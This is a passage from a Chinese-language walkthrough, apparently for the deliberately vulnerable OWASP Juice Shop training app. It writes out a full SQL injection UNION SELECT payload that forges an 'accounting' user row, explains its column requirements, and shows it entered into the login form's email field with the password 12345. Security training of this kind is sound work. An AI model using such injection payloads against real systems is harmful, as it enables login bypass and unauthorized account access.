' UNION SELECT * FROM (
SELECT
15 as 'id',
'' as 'username',
'acc0unt4nt@juice-sh.op' as 'email',
'12345' as 'password',
'accounting' as 'role',
'123' as 'deluxeToken',
'1.2.3.4' as 'lastLoginIp',
'/assets/public/images/uploads/default.svg' as 'profileImage',
'' as 'totpSecret',
1 as 'isActive',
'1999-08-1614:14:41.644+00:00' as 'createdAt',
'1999-08-1614:33:41.930+00:00' as 'updatedAt',
null as 'deletedAt'
)--
Payload 说明:
UNION SELECT - 将虚假数据与真实查询结果合并
SELECT ... FROM (...) - 子查询动态构造用户数据
所有 13 列都必须指定
数据类型和顺序必须匹配
步骤5:使用 Payload 登录
在登录表单中输入 Payload 作为邮箱:
1
2
邮箱:' UNION SELECT * FROM (SELECT 15 as 'id', '' as 'username', 'acc0unt4nt@juice-sh.op' as 'email', '12345' as 'password', 'accounting' as 'role', '123' as 'deluxeToken', '1.2.3.4' as 'lastLoginIp' , '/assets/public/images/uploads/default.svg' as 'profileImage', '' as 'totpSecret', 1 as 'isActive', '1999-08-1614:14:41.644+00:00' as 'createdAt', '1999-08-1614:33:41.930+00:00' as 'updatedAt', null as 'deletedAt')--密码:12345